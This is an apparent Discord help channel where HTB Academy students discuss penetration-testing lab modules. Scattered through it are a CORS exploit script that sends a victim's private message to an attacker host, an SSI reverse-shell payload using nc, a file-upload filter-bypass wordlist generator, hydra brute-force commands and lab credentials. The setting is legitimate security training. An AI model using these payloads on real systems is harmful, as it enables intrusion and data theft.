#modules
ah yeah always use view page source
Hi everyone,
Module: User Account Control
I just want to check if my understanding is correct.
Simplified: For UAC, the user is granted 2 tokens, 1 as low priv user and 1 for Admin. It is still possible to run powershell and cmd as Admin, without any modification, transferring dll?
Is the objective of the exercise so that the attacker would become less noisy? Or what exactly is controlled/limited?
if the user has admin rights, they can open cmd as admin and click yes on the prompt, and it will be started with the admin token
Hello, I am working on Password Attacks, "Credential Hunting in Linux". I am supposed to find the password of user Will and the hint says I should try to connect as user "Kira" using variations of the password "LoveYou1". I've created a mutated password list using the custom.rule that I created in the "Password Mutation" Section. I ran it using the command 'hydra -l Kira -P LoveYou1mut.list -s 22 -t 16 ssh://ip_address' however nothing came up. I do not really know what to try next.
2 things: don't attack ssh and use the custom.rule from the resources
Also kira lowercase since it's a linux host
Ok, I shouldn't attack ssh in general or is it just in this particular case?
Got it
Why can't I transfer this kind of slightly larger file?
hello guys I am trying to do a reverse port forwarding with ssh. however, when I enter the command ssh -R 172.16.1.5:9000:10.10.15.110:4444 htb-student@10.129.205.170 the pivot host is only listening on 127.0.0.1. Any help ?
In the ADCS module, ESC1 section, certipy auth fails on my side like this
[*] Using principal: administrator@lab.local
[*] Trying to get TGT...
[-] Got error: [Errno 104] Connection reset by peer
I have set DNS records in /etc/hosts to cover lab.local and lab-dc.lab.local. I have tried the exact same command as in the module and some variations as well. Every time my AS-REP request against the Kerberos endpoint does not get an answer and times out (recorded with Wireshark). Interestingly, I have also had this exact experience in an engagement a couple of weeks ago, though there was some special config on my client side. Does anybody know what may be going on?
I am using version 4.8.2.
it's a network/firewall issue, for labs resetting usually fixes it, if it's irl then yeah check with client
Specify the filename or end the sharename with a \
\\ip\sharename\file.extension
Or just \\ip\sharename\
hey everyone, how do i open the contents of a completed module? been taking a break and need to revisit some specifics from a module i finished
When you click on the completed module you can click "retake" to open it again, or if it's in a list like a job role or skill path clicking "view" will open it to the first section
both can't
Hey ppl, what is the alternative to Pwnbox for free users? can i just use any other vm to complete the task?
network error
Yes, you just need to download the ovpn file
I've been stuck for a long time.
Also since it looks like you're in an rdp session xfreerdp has the /drive: option to mount a share
It would show up under \\tsclient\sharename
HI! Can you push me in the right direction?
Advanced SQL Injections
Introduction to PostgreSQL
Questions - 4
HI! Can you push me in the right direction?
To answer the question, do I need to combine 3 tables?
What is the best way?
With subqueries or UNION and JOIN operators:?
It says I don't have permission. What should I do?
And I can't use the command using cmd opened with administrator privileges.
Maybe launch xfreerdp from a writable folder
I got stuck in getting started module
can you help me ?
Looks like you launched it from /home/
yes
Only if you actually ask your question
Why not share /tmp/?
I'll try.
This kind of detail is too deadly for newbies
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
smbclient -U bob ////ip//users
it doesn't work
It's working,thanks!!!
what's the exact command you used? and include the error, "doesn't work" is not descriptive at all
hi @next bronze , thanks for the reply. specifically for UAC that is always the case right? admin with limited privileges that can be enabled if they choose to?
He asks me the password, how do I get it + hint for this question is Bob likes use weak passwords
i tried
admin
bob
Welcome1
anonymous
space
yes, if they already have admin rights, then UAC is not a concern. when it's needed depends on the UAC settings. but this is only a GUI thing, so if you only have cli access, you'll need to find another way to get past it
one of those should work
oh right. got it. thanks!
None of them work + Is the way I write the smbclient correct?
Hy
Anyone had/having issues with the Attacking FTP target host keeping the FTP port closed? For the Attacking Common Services section
I wait enough time i would think for everything on the target to spin up, port stays closed regardless
smbclient -U bob ////ip//users
Error after entering an incorrect password:
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
//ip/share or \\\\ip\\share
it work , thanks
okay im new here and having a little difficulty, not sure where to ask lol
so I have set up a box, I go to ping the ip and it comes up destination host unreachable? Does that mean theres a problem with the box?
the openvpn connection output in the terminal you connected from
ah just checked that think its sorted it
It's pwnbox
Then something sounds like it's not set up right, try dragging and dropping the file with GUI
Hey I am doing the WordPress module, last assignment, where we have to upload a web shell via a theme. The problem is that I can not seem to be able to enter the admin panel. I am trying to brute force the password using rockyou.txt with wpscan but it is really slow
The transmission disconnected and I wondered if I should just fill in the answers and skip here, it's wasting too much of my time
Connect to the target and enumerate the available network shares. What is the password of the Administrator2 user?
for the WINDOWS ATTACKS & DEFENSE module, I cant find this tool Invoke-ShareFinder anywhere, am i supposed to download it?
🚨 🚨 🚨 HELLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLP PLEASE: i tried to reset my pssd but i didn't got any email from HTB, what to do?
u probably entered wrong email?
@inland shoal i checked it many time
idk but dont message here, go ask general chat or support
@inland shoal ok tnx
I have done much of THM and I take a break from ctf now I want to dive in more so make HTB account
bump
hello, in the module shells and payload The Live Engagement, how do i get the creds for the tomcat manager
fuck got them from the hint
so i was forced to check a hint?
Nope.
The creds can be obtained by || looking around in one of those 4 machines ||
The creds arent in server.xml.
that explains
ok i found out, we dont need the script, just move to the network share
Read my hint again slowly
dont overthink it, its much simpler than looking into config files
they basically hand you the creds when you rdp
Am I missing something here? Why would one just assume 'nibbles' was the password because it showed up in a few places in config file. There are numerous other words that could easily be the password in that file. This seems like a massive stretch to try this thought process for a real world engagement.
Any preliminary reviews of the binary fuzzing module?
Name of the machine.
There are some machines that use the name as password.
I agree its a bit weird and annoying since its not something that happens a lot. And not the same as like admin:admin
But it happens.
Took me an hour to find em
then took a step back and saw what i got handed, and voilà, got the creds
interesting. thank you
So basically I am new here, I am trying to follow the pen test path in HTB academy, is it normal that almost all the time I need to use "show solution" to finish the question?
I agree its annoying. And something many ppl wouldnt try either
Not sure if they still do it like that on the labs(since nibbles is old machine)
to be fair it is similar to the username and using username as pass is pretty common
and there are tools to scrape the webpages to get a wordlist, did that in one of my recent engagements
Well most ppl try user:user or with admin or tomcat etc. Sure if i get a michael ill try its name aswell but i think as a beginner you wont think about it.
yeah it makes sense but not intuitive
Well if you struggle on the first 2 modules id suggest some fundamental modules first. As the stuff will only get harder
No. You should try to understand the content so that you know why something works the way it does.
Have you already taken the Information Security Foundations Path https://academy.hackthebox.com/path/preview/information-security-foundations ?
Comrades, good day, I hope you are well. A guide to understanding the management of nessus? In the vulnerability assessment module, I think it's not so deep because I see that I have some gaps to handle the tool well, that I'm not saying that it's wrong, but I see that I need to go deeper into this topic
is there any reason why Kali linux takes forever to get smbclient?
Just another quick question let say for example this question: " Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result." In that module, I basically read through and understand every single one of those nmap command is doing, but through the solution, it mention that the number of ttl provide us the information of the operating system, there are not a piece of information in that chapter have mention about the details of this term, is it because I need to take that info security foundation skill path first to know what the "ttl" indicate? or it is something I should google myself?
Well id say 99% of ppl should have heard about ttl if you visited a highschool/college about computer stuff. But yea best bet is to learn about it via google.
Ttl stands for "time to live", refers to the amount of time or “hops” that a packet is set to exist inside a network before being discarded by a router.
The default initial TTL value for Linux/Unix is 64, and TTL value for Windows is 128.
So for example if you see a value close to 128, like example 127 etc you would know we work with a windows machine
Well not sure what is the point to mention 99 % of the people have heard about ttl. luckily I know what ttl is but just don't know it can be used to identify operating system.
Well you asked what ttl indicated
and well my response was more like: most ppl dont need to google what ttl is, but a lot of em just need to google how to identify os for example if they dont understand
Thats the provided module ip?
back2school
If I can't update smbclient with sudo apt install does that mean I cant complete the module?
Hey before taking ecppt what are the pre requisits ?? like can i directly go for it ?? how difficult is it?
ecppt? wrong server?
Best to ask in #starting-point
I try to download the file but it still tells me that network error for hours
I don't have access to this server
Then read and follow #welcome
it is good now thank you
Lmao
oh boy i am really really not a fan of subnetting
this upgrading the tty is just not working. I've been at it for about an hour now. Once I bring nc back to the fg hitting enter does nada. I just get those weird letters. CTRL-C doesn't work either and I have to just kill the window. if yall have seen this before let me know. ChatGPT just gave me the same instructions as HTB
stty raw -echo;fg
I'll give that a go. Thank you.
wtf, why does that work with putting fg on the same line
I would have spent another month trying to sort that out
Hi, could anyone please help me understand what am I meant to do here?
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
I have an FQDN (a subdomain) I found in a previous solution. I try to use dig on it but none of the TXT files appear to be using the requested format. I'm not sure I'm completely understanding what's required of me here.
Did you try to do the zone transfer for the authoritative server ? I don't think you can do a zone transfer on a subdomain but maybe someone smarter can confirm.
To perform a zone transfer on a subdomain, follow the same steps as for a regular domain:
Identify the authoritative DNS server for the subdomain.
Use a DNS querying tool like dig or nslookup to attempt a zone transfer against the authoritative DNS server.
Analyze the results to see if the zone transfer was successful and to extract any relevant DNS records, including TXT records.
-ChatGPT
What's considered an authoritative server?
This is one of the commands I've tried but it just says connection failed host unreachable
dig axfr inlanefreight.htb @10.x.x.x
hi guys, i'm just trying to complete the end of module test for "Information Gathering Web Edition"
I'm uncertain what this question is looking for: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?
server name as in it's hostname?
file upload attacks : Blacklist Filters MODULE
i upload the file successfully but i cant execute it
make sure you found all subdomains
Can someone help me, i need to edit the /etc/proxychains.conf for a module but i dont have permission
maybe just "sudo vi /etc/proxychains.conf"?
Find all subdomains and then use dig axfr inlanefreight.htb @<subdomain> or something else?
Omg i'm dumb ty XD
the dig syntax is: dig <query type> <target domain/subdomain> @nameserverIP
query type can be axfr
Lol
No worries
No, there's a section in one of the tools that literally is the "server name:"
@roguesec im on the same module
i finished the black listed one
but the white listed is crazy hard
u did it ?
if anyone can help me i tried everything for hours it keeps giving me this
file upload attacks : white Filters MODULE
There are 3 ways to bypass it in that section. Your screenshot shows one way. Did you try the other 2 ways?
Hi, anyone know how to download the cheat sheets of academy in .md or the old extension that modules have
shouldnt the word list i created with this script contain all methods
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps' '.phar' '.phtml'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
not sure you'd have to look
give me some tips
i did: use another method taught in the section that's not character injection
doesn't burp suite help with this
ok educate me about what u did cause i am really stuck
DM me
ok
Hey everyone! Long time reader, first time....writer? i am currently stuck on the "Shells & Payloads"/Infiltrating Windows section/ Question 3: Basically gain shell and find flag.txt, when I print the flag it seems to be corrupted or encrypted in some way and I was wondering if someone could provide some insight to what i can try?
DM me, it should print fine
I got all the way to the final assessment for this entire File Uploads Module. However i felt uneasy about my knowledge, so I rebooted the entire module from section 1.1
I got stuck on type filters for like 3 days
i just finished the type filters was hard ngl
Anyone else having issues with Targets Spawning? Been waiting 5-10 minutes and seems like it's not going to happen
me too
hey guys, anyone else having issues with the website? very slow loading times, connection dies randomly
Haven't really had an issue with the HTB Academy site, but my targets aren't spawning so hanging it up for awhile
Need to little nudge on
SERVER-SIDE ATTACKS: Blind SSRF Exploitation Example
I got the flag through other method but can anyone help with why the given html code with reverse shell exploit when uploaded to the file to pdf converter site doesn't give a reverse shell??
I tried the exact same method explained in the section
- Double URL encoded the python rev shell code
- put the above in the html file and save it
sudo nc -nvlp 9090
- Uploaded the malicious html file
But no reverse shell 
If I want to use my own box for doing the modules is there a trick to getting similar / the same helper files as on the htb machines? e.g. common usernames etc
I am on the ZAP Scanner section of the Using Web Proxies module. The question indicates to use ZAP Scan and leverage the high vulnerability that is identified. I've scanned a number of areas and ZAP doesn't seem to identify any high vulns. At this point I'm not sure if I missed something or maybe ZAP just isn't playing well and I'm wasting my time. TIA.
What the hell is this account, I've been trying for a long time with no luck
FOOTPRINTING > SNMP
can hint me for this
Enumerate the custom script that is running on the system and submit its output as the answer.
snmpwalk -v2c -c public 10.129.26.8
( But i dont see the flag??)
Have you read the hint?
jmarston?
Are you asking or did you try it?
I used a script that included this name, but I don't seem to have had any success, I'm going to try it again now using this name
That should find it for you unless my notes are bad
I assume you're asking about seclists? If you have Kali or Parrot they both should come with it. Else you can just grab it here
Mine didn't return any high alerts either, but I was able to find it from a medium.
You can DM me if you want
Hi, I am doing the Password Attacks Lab - Medium. I have run out of options and I would really appreciate few hints on what to do next.
What I have done so far:
||1. Decrypted the Documentation.docx from the Samba share and got password for j* user.||
||2. SSH into the server, enumerate the MySQL server and got creds for d* user.||
I have checked various steps mentioned in Credential Hunting in Linux, but I cannot find anything for privilege escalation.
Perhaps an id is useful
Also: heavy spoilers with usernames and such
One of the first things I do when I get another user's creds is check what the user has been doing.
Added spoiler
I was going to suggest to substitute user, basic but easy win with new creds.
Spoiler tags do nothing, you can easily redact usernames with first initial *
I.e. j* and d*
Those that have done it will generally be able to understand where you're at and assist from there
I have edited the usernames
I checked the user's history but got nothing there.
whaaat really? i wonder if they changed it. i got a direct answer there.
This was the case for Easy Labs though
The user just belongs to its own usergroup
if that's the case i'd say hunt for hidden files/folders
That was a hint btw, relating to ssh
You might be thinking of something different
i'm definitely not
This one doesn't have creds in history
Which user are you currently interacting as? J or D?
Yeah I was referring to plaintext creds
Something is interesting about the history though
Then listen to those two. Check history and for hidden files
I found one log that suggests CVE of 2018, but I don't think that is the right direction. Other than that, I can't find anything.
DM me
Looks good thank you
CVEs not required
Sometime,I about to give up in some section until I realized that I forgot to connect the vpn
Just figured out what went wrong
A tiny mistake
BTW thanks for the poke
🤜🤛
After getting creds of d*
Looks for some files, history, etc in d*'s ssh session
There you will find some
Then crack that something
And then you will know what to do 
Put the output of your command in a text file
Then try to grep the flag from it (format i.e HTB{)
Hope it will make things a little Faster
Got it thanks. Couldn’t find initially
After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?
Can someone please give me the answer for this ffs (WINDOWS ATTACKS & DEFENSE Module)
I got the answer by following the steps but its not accepting it
||[-] exception RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.||
Maybe the error code is the RPC_... part
this is the hint given though Copy and paste the entire error message, starting with [-]
wait i think i missed out the 'restart DC step' thats why
Lol
Hey guys! Can I get some help with the CORS Misconfiguration module? I have an exploit on the Exploit Server but the withCredentials doesnt seem to be working, the xhr request just takes me to the 'Sign In' 'Sign Up' page (unauthenticated)
Here is my exploit:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb:54234/profile.php', true);
xhr.withCredentials = true;
xhr.onload = () => {
var doc = new DOMParser().parseFromString(xhr.response, 'text/html');
var msg = encodeURIComponent(doc.getElementById('private-message'));
location = 'https://exfiltrate.htb:54234/log?data=' + btoa(msg);
};
xhr.send();
</script>
Anyone here managed to complete the Whitebox Attacks module Skills Assessment? Having a complete mare with it at the moment...
Hello, am trying to do blind sql injection module RCE part and I do not know why but the server is not making the http request to download the nc.exe hosted on my server.
I tried with ping and indeed the command is executed but my PC does not reply, I enabled the firewall rules
do i still get access to the course materials if i finish it and my subscription expires ?
sounds dumb but what is the answer to the question from Attacking Common Applications -> ColdFusion - Discovery & Enumeration. I tried every protocol i found but nothing was right
yes
Hi guys! Did anyone do this module?
Module: Active Directory Trust Attacks
Section: Unconstrained Delegation
Link: https://academy.hackthebox.com/module/253/section/2803
Question: Abuse Unconstrained Delegation to get the TGT of DC01$ and submit the flag located at \DC01\UCD_flag\flag.txt
i replicated the attack as mentioned in the module but either the Spoolsample is not working or i dont know because there are now TGT appearing.
Also the environment is really slow and connection is keep erroring out. Please HTB at least the paid things should work properly.
just following the steps in the module worked for me, you need to use rdp tho
i did exactly the same
then Idk, the tgt for DC01$ appeared and it worked
I puffed for a day and managed to overcome it on my own!!!😁 🦾
good for you. I am sick and tired that connection breaks every two minutes of HTB and services dont work. When will HTB fix this to have a "working" environment? And dont tell me my connection is weak:D
Anyway i did it from linux...
nvm I got it
We’ve fixed the VM slowness issue for this module on EU-ACADEMY-2 Server. Please try to respawn the target using EU-ACADEMY-2 VPN server. Rest of the servers will be patched in few hours.
I tested the section and it is working as expected.
Where was the channel for reporting typos in modules?
It's this now https://discord.com/channels/473760315293696010/1234357888114364508
I prefer a text channel over threads
This way you can see what has been completed and what is still open.
Especially for erratum I think this view is better
Can just react with a ✅ 🤷🏼♂️
i'm for this new change
for the WINDOWS ATTACKS & DEFENSE (PKI - ESC1) module, what should i do with my cert.pfx file? running this command in bob machine does nothing
.\Rubeus.exe asktgt /domain:eagle.local /user:Administrator /certificate:cert.pfx /dc:dc1.eagle.local /ptt
am i supposed to be transferring the pfx file to bob machine?
hi
resolved, had to manually copy the cert.pfx to bob
I found that Medium article as well which is why I started to believe it's not worth chasing any longer. At least I know I'm not the only one now so thank you for clarifying!
Not a medium article but a medium alert
Hey, I need help with this following problem. The question is
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
I've tried this and get 3
||netstat -ln4 | grep "LISTEN" | grep -vE "127" | wc -l||
can anyone help?
(NVM got it!)
Hi, I just tested your exploit and it works if you deliver it to the victim (although there is a minor issue that will prevent you from getting the flag). However, the reason why it does not work for you locally might be because of your browser's settings regarding third-party tracking. For instance, I just tried your exploit in the default configuration of Burp's builtin Chromium browser, and it does not work, but generates the attached warning in the Console. To prevent this from occurring, adjust the browser settings accordingly. I'm going to add a note to the section to make it more clear. 🙂
Oooh that makes a lot more sense! So just for my knowledge, do you have a default setup browser to not encounter these issues? Cuz I tried the same in Firefox and encountered the same issue
I'm doing the skill assessment on Attacking Common Application. i need some help
I've scanned the vhost and did a FUZZ on it
but can't seem to find the correct url
??
Hello, very good, the reason for this post is because I am having problems logging into my hack the box account.
I am providing the correct credentials but for some strange reason it does not allow me to log in, it tells me that the credentials are invalid
and when trying to reset the password with the email I do not receive any email from htb to reset the password, this is what it tells me:If this e-mail exists, then you will receive a reset link at: xxxxxxx@gmail.com But I am not receiving said email
Reach out to support
ok gracias
Module: Attacking web applications with ffuf
High ms on pwnbox locations.
Anyone else facing this issue?
can anybody help me with Privilege Escalation - Nibbles?
No
Can someone help me doing the second thing, i have the cookie but i dont now how to continue
If you would like help, it is best if you say which module and which section you are in.
Then it is always helpful if you tell us what you have already tried.
Most users here can't help with a simple print screen of a question.
What exactly is the problem?
dm me
USING WEB PROXIES module
and ZAP fuzzer
I have search for the txt and hashed it with md5, but idk what is the result
Which list did you use?
root
admin
test
guest
info
adm
mysql
user
administrator
oracle
ftp
pi
puppet
ansible
ec2-user
vagrant
azureuser
The thing is do i have to fuzz the cookie with the username in md5
The module shows you how to do this
Read the chapter Processors again
I mean i understand that, but i dont know where i should fuzz in the response, to get the username
Read the question again
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
I need help on conditional branching in Intro to Assembly Language. The question is "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?".
I am pretty sure that if I change rax to 2 then it wont loop. But I am not sure what hex value it wants. I have tried 0xA, 0x10 and many more but just doesnt work. Below is the assembly code:
global _start
section .text
_start:
mov rax, 5 ; change here
imul rax, 5
loop:
cmp rax, 10
jnz loop
hello guys,
Sometimes i want to connect to machine and i take this output
└─$ xfreerdp /v:10.129.111.13 /u:htb-student /p:Academy_student_AD! /dynamic-resolution
[20:14:51:613] [4368:4369] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[20:14:51:613] [4368:4369] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[20:15:00:652] [4368:4369] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[20:15:00:654] [4368:4368] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
Hey, just wanted to say thanks for this tip. Exploit works perfectly now. I agree a small hint on the page will help hours of debugging (Should have checked console issues but you live you learn)
You'll want to wrap the pw in single quotes /p:'password' and /cert:ignore should help with that error message. Edit: wrong flag too much ligolo on the brain. Edit2: you can also increase the timeout /timeout:60000
hey is it worth doing the basic toolset path if i'm also planning on doing the CPTS path? i just want to get a headstart on solving ctfs and stuff like that
Cpts path won't really help with ctfs tbqh
There's some stuff that's useful like footprinting and basic service stuff
But the overall focus is a domain env
oh yeah that makes sense
Ctf environments are different, and often not interconnected
how do i learn how to solve ctfs
Look up past ctfs and published challenges, read solves for them, take notes
There's also the challenges section of htb labs
I am stuck on the same problem 
wouldn't there be similar techniques and tools though?
since i mean the overall goal is still enumeration, exploitation, privesc, and post exploitation (usually)
is the process really that different?
I mean mostly, but there's also a lot more gimmick stuff
CTFs don't often focus on just PWN
There's a variety of categories
Pretty much, yeah
As in cases with HTB hosted ctfs sometimes there's "repeat" or "reprisal" challenges, which are basically v2/v3 of a popular challenge or a challenge that didn't get a lot of solves
Yup
that makes sense
A low security posture environment, but a realistic environment nonetheless
Can use a nudge on question 3 for NTLM Relay attack skills assessment. peas and tanks
why cant i xfreerdp i RDP to with user "htb-student" and password "Academy_student_AD!" i do this and i try to xfreerdp but it always say [12:56:47:827] [2561:2562] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:56:47:827] [2561:2562] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:56:47:827] [2561:2562] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:56:47:827] [2561:2562] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
i reset like 20 times
I am facing trouble with threat hunting module skill assesment hunt 2
Wrap the password in single quotes
ik i log in but the freerdp screen is just black and never loads i can login
Press enter
what happened to old erratum
we have the same problem.
xfreerdp /u:Username /p:Password /v:Target_IP
i can't access this
#1234357888114364508 they moved it to a forum style like #1024429874246590575
Why I can't talk to general ?
Read and follow #welcome
I know but I wanted to see some erratum sentinel wrote now i need to google it ugh !
It's probably archived
So not gone forever
I would prefer they made it read only and warned people it was changing
🪄
whats wrong in this
module
Nginx reverse proxy & AJP SERVER_SIDE ATTACK
Looks like you don't have it configured
u mean the nginx conf ?
yeah, you have all the server info commented out, so it's not actually running which is why you get a failure to connect
that configuration file is going to ignore anything with a # before it
i know the module said comment it I removed the # and still the same
pay closer attention to how the module says to set it up, you're missing stuff in your server block
So guys im a bit confused. I'm doing the common service attack on the ftp section, and i'm trying to enumerate ftp like it said but the port is closed. is this some kind of glitch?? if the port is closed you cant do anything with ftp right?
just completed the vulnerability scanners module. Didn't enjoy that one as much as the ones previous
oh well
I did have a general question, which I will also post in cpts. As I have been going through the modules it occurs to me that some snippets to automate bits of the methodology I'm learning would come in handy. For example:
enumeration with NMAP. start with host discovery scan. then probably always a top 1k port scan for tcp and udp. then feeding that into another sweep for version and script scanning of ports found. While kicking off a full tcp port scan.
then for dns enumeration for subdomains. Can probably chain together some scripts for passive and active methods.
Wondering what type of automation snippets ppl have found useful to build up
while automation can be good, i personally would want to inspect it all manually anyway in case the tool missed something
yeah I agree. but there's some stuff that can be kicked off up front and then we can go back and get more manual
i guess since we talking about building our own automation, we will know exactly what the scripts are doing so if need be we can go back and take another look
I think what i need is a bit of a conclusion oooor list of tools for each stage in my notes
I have been trying this but when I do the command ||qemu-nbd -c /dev/nbd0 Backup.vhd ||it gives me this error; after I use --format=raw it then gives me "Failed to set NBD socket"
i didn't have any issues ¯_(ツ)_/¯
If you're able to access it and get the files then you're fine
I cant lol
whenever i xfreerdp into the machine its just black?? and i reset it like 10 times but it just remains black how do i fix
Did you unlock it?
I told you before: press enter
Many people have had the same question
Wdym? I have cracked the password and that's the farthest I've gotten. Been trying to mount this so I can unlock it but I have yet to have success
It's literally just the "this is a domain joined computer, and you agree to use this computer for work purposes"
Read the rest of the article?
It literally details how to identify and fully mount the bitlocker vhd
??? So if I read the rest of the article it'll fix the first command for me then?
It'll allow you to unlock and access the encrypted drive, yes
That command is only one part of the process
If the device was unencrypted, then that'd be it. But since it's encrypted, there's more to do
yea nope, I tried the commands 4 times in a row each time closely looking at it and I still can't seem to understand why it's not working
don't copy word for word obviously
but needless to say; it works on my machine
I would also be sure to check that it didn't get messed up in transfer
yea and you also said the first command I sent worked fine and it's not working on mine 😭
no, i said the first command is only the first step for encrypted drives
?
if you run file Backup.vhd
as in I don't recall having any major issues after doing all the steps
they worked fine for me
if there were any errors i either ignored them or i just didn't pay attention
MODULE: Whitebox Attacks
SECTION: Authentication Bypass
I'm a little hung-up on the exercise. Reading through the code, I'm a little hung-up on the way forward:
- I tried testing against various "admin" account values, including magic hashes.
- Upon scrutiny, I saw that the profile.php page renders its output based on the user input, not the database entry. So I've tried assorted values like "qweasdadmin", knowing the hash is being compared against null values, but since hash() returns a string, I don't see a match-up working.
Can I get a nudge?
and I think this is where I'm getting hung up, do I decrypt the drive BEFORE I mount it to a partition? or does that come after
do the qemu-nbd part; then do the decryption steps
again it's a multipart process and the steps are laid out right there
Your approach with the admin is correct.
Try bypassing the password
the nbd part is only part of the process of fully mounting it
think of qemu-nbd command as prepping it
like allocating a partition for it
yea and that's my problem, the qemu-nbd command isn't working for me. I keep getting "Failed to set NBD socket"
yes
gimme a sec
Ok the first one wasn't working because I was using the wrong partition, but the cryptsetup command is giving me:
I got the qemu*
because that's not the device partition
look at lsblk
the guide used /dev/nbd0p2
Is there a command to get to nbd0p2? because on my lsblk I don't have one
well your nbd partition might not be p2
look at the nbd partition; then discern from there which partition the data is on
it might be nbd0p1
So when I did qemu, I did sudo qemu-nbd -c /dev/nbd2 Backup.vhd --format=raw
and no p2 or p1 was created
it just added it to the nbd2
what does lsblk show
I tried a different version, where you use loop100 and the same thing happened
where no p1 or p2 were created
christ you have so many nbds
if you do file Backup.vhd what does it say
i would just download a new Backup.vhd
it sounds also it shows there might be some data on those nbd sections
but you fucked it so many times that idek
and if you do ls -la Backup.vhd it's not showing as empty?
(it's not large iirc)
I would honestly restart your system as well
ok so it's not empty
yea igot the password from it
sec
maybe I'll have to just restart and redo this whole part tomorrow when I'm not frustrated haha
i'm just testing it again on pwnbox
looking for a quick pointer on base64 encoding...I'm sure I'm missing something easy. I'd rather place the output of encoding into a file, copy the file over and then decode the file itself on the target machine...i.e.
base64 linikatz.sh > linitext.txt
-upload to target
base64 -d linitext.txt > linikatz.sh
hashes don't match up between attacker/target machines....so something is obviously wrong. Is it because i'm encoding the file instead of the script within the file?
Proper way in documentation for the module I'm working in to encode would be something like:
cat linikatz.sh | base64 -w 0;echo
then to decode:
echo -n '<output>' | base64 -d > linikatz.sh
how are you uploading it? also what's wrong with just uploading as is? there's usually no need to encode
python server on attacker machine....wget on target to pull the file
you can wget without having to encode
sh is text based anyways, b64 wouldn't do much
i transferred without encoding before and running the transferred script vs. local linikatz.sh on the server provide different results...so obviously the two could just be different but looking at them they appear to be mostly the same
but i didn't look at every single line yet
compare hashes but I doubt it's anything to do with encoding
use tcp vpn, if you use udp you might drop packets and lose data
yeah it's something with the file, thanks for the input
also i believe b64 adds an extra newline from what i remember
which could also explain the different hashes
i just did it all (with sudo) and it worked just fine for me
not the place to ask about teams
read and follow #welcome to access more of the server
my problem isnt that one anymore, it was the partitions werent showing up
as I said i just did it fine (also I didn't specify the format) ¯_(ツ)_/¯
literally just 5 seconds ago
Then can u say me please which certificates are necessary for beginners?
and I literally saw that, but that doesn't answer why these weren't showing up
Bodyfat wtf?

Are u in the cycle?
???
Mamamiya
he's talking about my bio
bro read #welcome to see how to access more of the server or just leave
this isn't a gen chat channel
if you wanna know about what certs you should aim for there's even a #careers-and-certs channel
looks like it's an issue with nbd?
try sudo modprobe nbd again
and maybe try a different dev
i just noticed when you modprobe nbd it generates like 15 nbd devices
anyway
it's weird that it's not doing anything and i'm assuming your kali is updated
ahh
is yours the same or diff?
it means your Backup is missing some stuff
ahh gotcha that's what I thought
delete your copy and redownload it
kk
it looks like yours is missing part of the partition table
yea Ik I saw that, but I wanted to try what you were saying first before I do that
true
Who’s familiar and or know about go high level
well the question likely doesn't belong here
but also https://dontasktoask.com
(genuinely read that)
asking to ask (or seeking an expert) type question in asynchronous communication channels just takes longer to get answered
But you just answered me wouldn’t you have saved me time by you know just not answering
read and follow #welcome and maybe ask in #programming though, as an also serious note
I'm literally explaining to you why asking to ask is dumb
and you still didn't ask your question ¯_(ツ)_/¯
You’re dumb
Some people 🙄
Thank you emma
I think this is a replacement for exercise tutoring
https://academy.hackthebox.com/news/7-dec-2022
I didnt see this existed either
Guys I’ve been doing the CRUDE API question still can’t figure out
It’s the question where I have to update a city name with “flag” and then delete a city, lastly search for a city “flag” to get the flag
Only if you enter the answer wrong so many times did it pop-up saying click here for help which pinged someone to reach out to you over discord
Thats pretty cool
Cool until you're spacing it, pasting in the wrong flag over and over again and then accidentally click the discord button. Then someone you're not expecting to reach out to you and you ignore the help request then realize that is what it was and you feel like an ass.
hey all im banging my head on SSI Injection Exploitation Example. I've got a netcat listener on port 9090, but nothing returns when i include the injection from the lesson, the page just loads forever. any help would be appreciated. the payload (used 10.x.x... IP): <!--#exec cmd="mkfifo /tmp/foo;nc <tun0 IP> 9090 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
nevermind. The lesson doesn't have much to do with getting the flag, there are other ways to get it.
guys I'm stuck at Limited file uploads in the file upload attack module, i can't seem to find a method to read the source code of upload.php, any hints?
Hey,I not sure if I get it wrong.
The amount of cubes and modules I completed does not match
i think the payload example works doesn't it?
I completed 8 modules but my cubes around 40 (I only had single in-progress module)
on most modules you get back 20% of your cubes
if you go to the dashboard and look at the modules it also shows you the number of cubes you get for completing it
